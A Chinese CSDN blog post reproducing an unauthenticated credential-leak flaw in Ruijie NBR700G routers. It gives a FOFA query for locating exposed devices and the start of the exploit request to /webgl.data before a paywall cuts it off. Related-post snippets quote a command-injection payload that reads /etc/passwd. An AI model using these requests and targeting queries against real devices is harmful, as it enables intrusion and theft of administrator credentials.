锐捷网络NBR700G 信息泄露漏洞

已于 2024-03-13 21:23:32 修改
阅读量227 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-13 21:23:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136692059
版权

简介

锐捷网络NBR700G路由器是锐捷网络股份有限公司的一款无线路由设备。

漏洞描述

锐捷网络NBR700G路由器存在信息漏洞,未经验证的攻击者可以通过未授权访问获得路由器管理员账号密码。

影响版本

锐捷网络NBR700G路由器

资产数量

Fofa语法:

body="系统负荷过高,导致网络拥塞,建议降低系统负荷或重启路由器"

影响数量:
43,442

漏洞复现

GET /webgl.data HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
A
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
锐捷网络NBR700G 信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-15 426
锐捷网络NBR700G路由器是锐捷网络股份有限公司的一款无线路由设备,锐捷网络NBR700G路由器存在信息漏洞
锐捷NBR路由器fileupload.php任意文件上传漏洞
xiaokp7的博客
09-13 1480
锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写,意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能,适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞,可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。
Goby 漏洞更新|锐捷网络 NBR路由器 webgl.data 信息泄露漏洞
m0_46699477的博客
05-27 1994
锐捷网络NBR700G路由器是锐捷网络股份有限公司的一款无线路由设备。锐捷网络NBR700G路由器存在信息漏洞,攻击者可利用该漏洞获取敏感信息
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞(CNVD-2021-09650)——漏洞复现
2301_76437855的博客
06-11 355
锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。公开日期:2021-09-19漏洞编号:CNVD-2021-09650危害等级:高危漏洞描述:锐捷NBR路由器存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
漏洞复现】锐捷网络NBR700G 信息泄露
qq_67810151的博客
03-09 458
锐捷网络NBR700G路由器存在信息漏洞。未授权的攻击者可以通过该漏洞获取敏感信息
锐捷EG易网关与NBR路由器命令执行漏洞-2
热门推荐
1stPeak's Blog
08-09 1万+
锐捷EG易网关与NBR路由器——命令执行漏洞
【1day】复现锐捷 NBR 路由器 存在任意文件上传漏洞
记录并分享学习安全的知识点..
08-21 901
锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写,意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能,适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞,可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
CCPxxxXxxx的博客
08-04 9998
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 漏洞编号: CNVD-2021-09650 漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取 漏洞影响: 锐捷NBR路由器 EWEB网关系统 漏洞复现: 首先打开网关系统 然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。 我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/pas
锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)
孤桜懶契
04-14 1万+
漏洞描述 i ⭐锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限 漏洞影响 s ✅锐捷NBR路由器 EWEB网管系统 空间测绘 d ⭕FOFA:title="锐捷网络-EWEB网管系统" ⭕FOFA:icon_hash="-692947551" 漏洞复现 ✅访问首页 ✅执行Payload命令 POST /guest_auth/guestIsUp.php mac=1&ip=127.0.0.1|cat /etc/passwd > test.tx
锐捷NBR路由器修改特权密码和telnet密码
月球挖掘机
08-24 888
【代码】锐捷NBR路由器修改特权密码和telnet密码。
tplink RG NBR700G编程器备份固件
02-17
tplink RG NBR700G编程器备份固件
锐捷RG-NBR700G固件
最新发布
06-16
锐捷RG-NBR700G固件
锐捷网络路由器NBR1 100G上市.pdf
10-09
总的来说,锐捷网络NBR1 100G路由器和中兴通讯的IMS解决方案都体现了信息技术在提升网络效率、优化通信体验方面的进步。这些技术的广泛应用将极大地推动企业、教育、政府等领域信息化水平的提高,同时为运营商提供...
锐捷睿易RG-NBR700好不好用?锐捷睿易RG-NBR700 smart路由器详细评测
10-01
锐捷网络旗下锐捷睿易子品牌公开轻量化smart新家族,是一款性能强劲、使用简便、功能丰富的有针对性的smart系列上网行为管理路由器,下面评测就是其中一款锐捷睿易RG-NBR700,希望对大家有帮助
锐捷睿易RG-NBR700W性能如何?锐捷睿易RG-NBR700W企业级路由器使用实测
10-01
锐捷睿易RG-NBR700W是款专为中小企业无线组网而设计的企业级无线路由器,可令用户无死角的进行无线办公,那么这款新品WiFi使用情况到底如何呢?下面就详情来看看了解下吧
CVE-2023-3450 锐捷Ruijie路由器命令执行漏洞复现
08-07 2675
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。
锐捷NBR 1300G路由器 越权CLI命令执行漏洞
自强不息
10-28 374
各家兴便是天下大同
锐捷路由器命令执行漏洞(CVE-2023-3450)
xiaokp7的博客
09-13 898
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。RG-BCR860 2.5.13版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。
锐捷 NBR 路由器 fileupload.php 任意文件上传
weixin_43567873的博客
03-08 154
锐捷 NBR 路由器 fileupload.php 任意文件上传
锐捷eg网关与nbr路由器命令执行漏洞
07-29
锐捷EG网关和NBR路由器是锐捷公司生产的网络设备,近期被曝出存在命令执行漏洞。 该漏洞的存在使得攻击者能够通过特制的网络请求执行恶意命令,从而导致系统被入侵和控制。其中锐捷EG网关的漏洞编号为CVE-2017-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值